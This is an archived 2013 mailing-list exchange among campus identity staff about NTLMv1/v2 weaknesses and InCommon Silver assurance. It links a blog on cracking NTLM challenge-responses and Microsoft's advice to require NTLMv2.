Skip to Content.
Sympa Menu

ad-assurance - [AD-Assurance] RE: Sorry for the NTLMv1/v2 confusion

Subject: Meeting the InCommon Assurance profile criteria using Active Directory

List archive

[AD-Assurance] RE: Sorry for the NTLMv1/v2 confusion


Chronological Thread 
  • From: "Capehart,Jeffrey D" <>
  • To: "" <>
  • Subject: [AD-Assurance] RE: Sorry for the NTLMv1/v2 confusion
  • Date: Fri, 21 Jun 2013 18:53:16 +0000
  • Accept-language: en-US
  • Authentication-results: sfpop-ironport07.merit.edu; dkim=neutral (message not signed) header.i=none

Here’s a blog I found about extracting the hash and then going on to brute-forcing the plaintext password from NTLM challenge response.  I also included Microsoft’s guidance on NTLMv1 and LM.  –Jeff C.

 

NTLM Challenge Response is 100% Broken (Yes, this is still relevant)

http://markgamache.blogspot.com/2013/01/ntlm-challenge-response-is-100-broken.html

 

How to use Cloudcracker to brute force out hashes.  MS-CHAPv2 uses the EXACT same math as the LM and NTLM challenge response.  Moxie demonstrates how one can submit the challenge and response to Cloudcracker to get back the LM or NTLM hash.

 

 

Security guidance for NTLMv1 and LM network authentication

http://support.microsoft.com/kb/2793313

 

To reduce the risk of this issue, we recommend that you configure environments that run Windows NT 4, Windows 2000, Windows XP, and Windows Server 2003 to allow the use of NTLMv2 only. To do this, manually set the LAN Manager Authentication Level to 3 or higher as described here.

 

From: [mailto:] On Behalf Of Ron Thielen
Sent: Friday, June 21, 2013 1:14 PM
To:
Subject: [AD-Assurance] Sorry for the NTLMv1/v2 confusion

 

I apologize for nearly derailing the conversation.  While I still maintain that hash stealing attacks against NTLMv2 are irrelevant to Silver assertion if you can't use the hash to authenticate to a service that compromises the actual password (e.g. as long as Shib isn't using Windows authentication), the piece I confused was that NTLMv1 does actually pass the password.  So, a brute force attack on v1 does get you the actual password, not just a hash collision.

 

This just reinforces my conviction that the world would be a much better place without Windows.  If only IBM had chosen CPM instead of MS-DOS back in the day.  :-)

 

Ron




Archive powered by MHonArc 2.6.16.

Top of Page